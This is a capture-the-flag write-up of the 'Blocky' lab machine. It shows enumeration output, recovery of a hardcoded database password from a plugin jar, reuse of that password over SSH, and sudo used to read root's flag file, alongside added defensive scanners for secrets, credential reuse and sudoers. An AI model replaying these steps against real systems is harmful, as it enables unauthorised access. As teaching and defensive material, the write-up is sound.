Blocky

OS: Linux, Difficulty: Easy, IP: 10.10.10.37

Initial enumeration

# Nmap 7.80 scan initiated Sat Sep 28 23:30:25 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 22,21,80,25565 10.10.10.37
Nmap scan report for 10.10.10.37
Host is up (0.23s latency).

PORT      STATE SERVICE   VERSION
21/tcp    open  ftp       ProFTPD 1.3.5a
22/tcp    open  ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open  http      Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
25565/tcp open  minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.4 (92%), Linux 4.8 (92%), Linux 3.16 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   240.30 ms 10.10.14.1
2   240.22 ms 10.10.10.37

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 28 23:30:49 2019 -- 1 IP address (1 host up) scanned in 25.06 seconds

The web server on port 80 runs a default WordPress installation with nothing of interest on the front page, so I ran gobuster against it.

/wiki (Status: 301)
/wp-content (Status: 301)
/index.php (Status: 301)
/wp-login.php (Status: 200)
/plugins (Status: 301)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/javascript (Status: 301)
/wp-trackback.php (Status: 200)
/wp-admin (Status: 301)
/phpmyadmin (Status: 301)
/wp-signup.php (Status: 302)
/server-status (Status: 403)

/wiki and /plugins looked interesting. The wiki held nothing but a note; /plugins, however, contained two jar files.

BlockyCore.jar looked the more interesting of the two, so I extracted its contents (a jar is just a zip archive).

$ unzip BlockyCore.jar -d output
$ ls -laR ./output
.:
total 16
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 5 jtnydv jtnydv 4096 Sep 30 18:31 ..
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 com
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 META-INF

./com:
total 12
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 ..
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 myfirstplugin

./com/myfirstplugin:
total 12
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 ..
-rw-r--r-- 1 jtnydv jtnydv  939 Jul  2  2017 BlockyCore.class

./META-INF:
total 12
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 ..
-rw-r--r-- 1 jtnydv jtnydv   25 Jul  2  2017 MANIFEST.MF

BlockyCore.class was the only interesting file in the extracted tree, so I dumped its bytecode with javap to get something readable.

$ javap -c BlockyCore.class 
--- SNIP ---
public com.myfirstplugin.BlockyCore();
    Code:
       0: aload_0
       1: invokespecial #12                 // Method java/lang/Object."<init>":()V
       4: aload_0
       5: ldc           #14                 // String localhost
       7: putfield      #16                 // Field sqlHost:Ljava/lang/String;
      10: aload_0
      11: ldc           #18                 // String root
      13: putfield      #20                 // Field sqlUser:Ljava/lang/String;
      16: aload_0
      17: ldc           #22                 // String 8YsqfCTnvxAUeduzjNSXe22
      19: putfield      #24                 // Field sqlPass:Ljava/lang/String;
      22: return
--- SNIP ---

That gives us credentials for the MySQL server, root:8YsqfCTnvxAUeduzjNSXe22, hardcoded as string constants in the plugin's constructor. They logged me into the phpMyAdmin interface found earlier, where the wp_users table yielded the username notch.
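The credentials above leaked because they sit as string constants in the class file's constant pool, where anyone who can download the jar can read them. Below is an added example (my own code, not part of the original writeup or of the BlockyCore plugin) of the kind of check a build pipeline can run over a jar before it is published: it parses the constant pool of every .class entry, lists the string literals that ldc can load, and flags high-entropy literals together with identifiers named like credentials. The sample jar, class name com/example/Sample and the secret EXAMPLE-sEcR3t-p4ssw0rd-9Qz are constructed for the demo and are not the box's real plugin.

```python
import io
import math
import re
import struct
import zipfile
from collections import Counter

# Byte length of each fixed-size constant pool entry (JVM spec, section 4.4);
# tag 1 (Utf8) is variable length and is handled separately.
CP_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
            12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
SECRET_NAME = re.compile(r"pass|pwd|secret|token|api_?key", re.I)


def parse_constant_pool(data):
    """Return ({index: utf8 text}, [utf8 index of each CONSTANT_String])."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    (count,) = struct.unpack(">H", data[8:10])
    pos, i, utf8, strings = 10, 1, {}, []
    while i < count:
        tag = data[pos]
        pos += 1
        if tag == 1:                        # CONSTANT_Utf8: u2 length + bytes
            (length,) = struct.unpack(">H", data[pos:pos + 2])
            pos += 2
            # modified UTF-8 equals UTF-8 for the ASCII literals we care about
            utf8[i] = data[pos:pos + length].decode("utf-8", "replace")
            pos += length
        elif tag == 8:                      # CONSTANT_String: u2 index of a Utf8
            strings.append(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += 2
        elif tag in CP_FIXED:
            pos += CP_FIXED[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag}")
        i += 2 if tag in (5, 6) else 1      # Long and Double take two slots
    return utf8, strings


def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_class(data, min_len=8, min_entropy=3.5):
    """Flag high-entropy string literals and credential-like identifiers."""
    utf8, strings = parse_constant_pool(data)
    findings = []
    for idx in strings:                     # literals loadable with ldc
        lit = utf8.get(idx, "")
        if len(lit) >= min_len and shannon_entropy(lit) >= min_entropy:
            findings.append(("high-entropy literal", lit))
    for name in utf8.values():              # field/method names live here too
        if re.fullmatch(r"[A-Za-z_$][\w$]*", name) and SECRET_NAME.search(name):
            findings.append(("credential-like identifier", name))
    return findings


def scan_jar(jar_bytes):
    """Run scan_class over every .class entry; a jar is just a zip archive."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith(".class"):
                found = scan_class(zf.read(name))
                if found:
                    report[name] = found
    return report


# --- constructed sample input (not the real BlockyCore.class) ---
SAMPLE_SECRET = b"EXAMPLE-sEcR3t-p4ssw0rd-9Qz"


def _u2(n):
    return struct.pack(">H", n)


def _utf8(s):
    return b"\x01" + _u2(len(s)) + s


def build_sample_class():
    """Minimal class file whose constant pool mimics a hardcoded DB login."""
    pool = [
        _utf8(b"com/example/Sample"),     # 1
        b"\x07" + _u2(1),                 # 2  Class  -> #1
        _utf8(b"sqlPass"),                # 3  a field name
        _utf8(b"localhost"),              # 4
        b"\x08" + _u2(4),                 # 5  String -> #4
        _utf8(b"root"),                   # 6
        b"\x08" + _u2(6),                 # 7  String -> #6
        _utf8(SAMPLE_SECRET),             # 8
        b"\x08" + _u2(8),                 # 9  String -> #8
        b"\x05" + struct.pack(">q", 1),   # 10-11 Long, occupies two slots
        _utf8(b"<init>"),                 # 12
    ]
    slots = sum(2 if e[0] in (5, 6) else 1 for e in pool)
    # header, pool, then empty access/this/super/interfaces/fields/methods/attrs
    return (b"\xca\xfe\xba\xbe" + _u2(0) + _u2(52) + _u2(slots + 1)
            + b"".join(pool) + _u2(0x21) + _u2(2) + _u2(0) + _u2(0) * 4)


def build_sample_jar():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("com/example/Sample.class", build_sample_class())
    return buf.getvalue()
```

The entropy threshold is a heuristic: it catches a random 23-character password but not a short literal such as "root", which is why the identifier check runs alongside it. In practice the fix is to keep the database login in a configuration file outside the served web root (or in the plugin's data folder with restrictive permissions) rather than in compiled code.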

I tried cracking notch's WordPress password hash, but it was not in the rockyou.txt wordlist, so I set that aside and instead tried the usernames and passwords I already had against the SSH server.

$ ssh root@10.10.10.37
root@10.10.10.37's password: 
Permission denied, please try again.
root@10.10.10.37's password: 
# Password combination didn't work for root, however it did
# work for notch

$ ssh notch@10.10.10.37
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Mon Sep 30 07:40:07 2019 from 10.10.14.10
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
notch@Blocky:~$ 
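From the server side, the session above leaves a distinctive trace in /var/log/auth.log: a source that fails as root and then is accepted by password as a different user moments later. A failure-count threshold alone does not catch it (two failures is nothing), so the added example below (my own code, not from the writeup) keys on the user switch instead. The sample log lines are constructed, modelled on the "Last login ... from 10.10.14.10" line above, and the 2019 year is supplied because syslog timestamps carry none.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# sshd lines as written to /var/log/auth.log on Ubuntu 16.04 (syslog format)
SSHD_AUTH = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>[0-9a-fA-F.:]+) port \d+"
)


def parse_sshd_line(line, year=2019):
    """Return a dict for Accepted/Failed events, None for any other line."""
    m = SSHD_AUTH.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "src": m["src"]}


def detect_credential_reuse(lines, window=timedelta(minutes=15), year=2019):
    """Flag a source that fails as one user, then logs in by password as another.

    That sequence (root fails, notch succeeds) is what a reused or leaked
    password looks like from the server; a same-user retry is just a typo
    and is deliberately not reported.
    """
    by_src = defaultdict(list)
    for line in lines:
        ev = parse_sshd_line(line, year)
        if ev:
            by_src[ev["src"]].append(ev)
    findings = []
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        for i, ev in enumerate(events):
            if ev["result"] != "Accepted" or ev["method"] != "password":
                continue
            prior = [p for p in events[:i]
                     if p["result"] == "Failed" and p["user"] != ev["user"]
                     and ev["ts"] - p["ts"] <= window]
            if prior:
                findings.append({
                    "src": src, "at": ev["ts"].isoformat(),
                    "accepted_user": ev["user"],
                    "failed_users": sorted({p["user"] for p in prior}),
                    "failures": len(prior),
                })
    return findings


# constructed sample log, modelled on the session above (not a real capture)
SAMPLE_AUTH_LOG = """\
Sep 30 07:39:51 Blocky sshd[1201]: Failed password for root from 10.10.14.10 port 40110 ssh2
Sep 30 07:39:55 Blocky sshd[1201]: Failed password for root from 10.10.14.10 port 40110 ssh2
Sep 30 07:40:07 Blocky sshd[1210]: Accepted password for notch from 10.10.14.10 port 40112 ssh2
Sep 30 07:40:07 Blocky sshd[1210]: pam_unix(sshd:session): session opened for user notch by (uid=0)
Sep 30 08:02:40 Blocky sshd[1305]: Failed password for deploy from 10.10.14.20 port 50010 ssh2
Sep 30 08:02:48 Blocky sshd[1305]: Accepted password for deploy from 10.10.14.20 port 50010 ssh2
Sep 30 08:10:02 Blocky sshd[1340]: Accepted publickey for deploy from 10.10.14.30 port 50020 ssh2: RSA SHA256:EXAMPLEKEYFINGERPRINT
""".splitlines()

if __name__ == "__main__":
    for finding in detect_credential_reuse(SAMPLE_AUTH_LOG):
        print(finding)
```

Run on the sample it reports a single finding for 10.10.14.10 (root failed twice, notch accepted). The two hardening steps this box is missing are the usual ones: PermitRootLogin no and password authentication disabled in favour of keys, which would have turned the reused MySQL password into a dead end.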

User own

notch@Blocky:~$ cat /home/notch/user.txt; echo
59fee***
notch@Blocky:~$ 

Root own

Since we know notch's password and the id output shows membership of the sudo group, I checked what sudoers allows us to run.

notch@Blocky:~$ sudo -l
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

So we are effectively root: notch may run ALL commands, as ALL users and groups, on ALL hosts. This is game over.
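The entry behind that sudo -l output is the stock Ubuntu line %sudo ALL=(ALL:ALL) ALL, so any account dropped into the sudo group is root with a password. The added example below (my own code, not part of the writeup) is a small auditor for /etc/sudoers user specifications: it expands each line into one record per command, carries tags such as NOPASSWD across the command list the way sudo does, and reports entries that grant ALL commands, ALL run-as users, or passwordless execution. The sample sudoers text is constructed (the deploy and backup users are hypothetical), and aliases and #include directives are not expanded.

```python
import re

# One user specification per line: who hosts=(runas) [TAG:] cmd, [TAG:] cmd ...
USER_SPEC = re.compile(
    r"^(?P<who>[%+]?[\w.-]+)\s+(?P<hosts>\S+)\s*=\s*"
    r"(?:\(\s*(?P<runas>[^)]*?)\s*\)\s*)?(?P<cmds>.+?)\s*$"
)
TAG = re.compile(r"^(?P<tag>NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|"
                 r"LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|"
                 r"FOLLOW|NOFOLLOW):\s*", re.I)
SKIP = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias",
        "@include")


def parse_sudoers(text):
    """Expand each user specification into one record per command."""
    specs = []
    for raw in text.splitlines():
        # comments (and '#include' directives) are dropped; aliases not expanded
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        runas = m["runas"]
        # an omitted (runas) list means root; "(:group)" means the invoking user
        run_user = "root" if runas is None else (runas.split(":")[0].strip()
                                                 or "<invoker>")
        tags = []                     # tags apply to all later commands in the list
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            while (t := TAG.match(cmd)):
                tags.append(t["tag"].upper())
                cmd = cmd[t.end():]
            specs.append({"who": m["who"], "hosts": m["hosts"],
                          "runas": run_user, "tags": list(tags), "cmd": cmd})
    return specs


def audit_sudoers(text):
    """Return (spec, reasons) for every entry that deserves a second look."""
    findings = []
    for s in parse_sudoers(text):
        reasons = []
        if s["cmd"] == "ALL":
            reasons.append("unrestricted command set")
        if s["runas"] == "ALL":
            reasons.append("may run as any user")
        if "NOPASSWD" in s["tags"]:
            reasons.append("no password prompt")
        if reasons:
            findings.append((s, reasons))
    return findings


# constructed sample, not the box's real /etc/sudoers
SAMPLE_SUDOERS = """\
Defaults        env_reset, mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL        # every member of 'sudo' is effectively root
deploy  ALL=(root) NOPASSWD: /bin/systemctl restart minecraft, /bin/systemctl status minecraft
backup  ALL=(root) /usr/bin/rsync
"""

if __name__ == "__main__":
    for spec, reasons in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{spec['who']:8} {spec['cmd']:40} {', '.join(reasons)}")
```

On the sample this reports root and %sudo (unrestricted commands as any user) and both deploy commands (NOPASSWD), while the backup entry passes. The lesson for this box is the group membership rather than the sudoers file: a service account that only needs to run a Minecraft server has no business in sudo, and a narrow entry like the deploy line is what an operator-restart capability should look like.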

notch@Blocky:~$ sudo cat /root/root.txt; echo
0a969***
notch@Blocky:~$ 

Learning outcome

Thorough enumeration is the key to these machines; I had nearly missed trying the user notch with the password found for root. Keeping track of every username and password you collect is important while pen-testing.
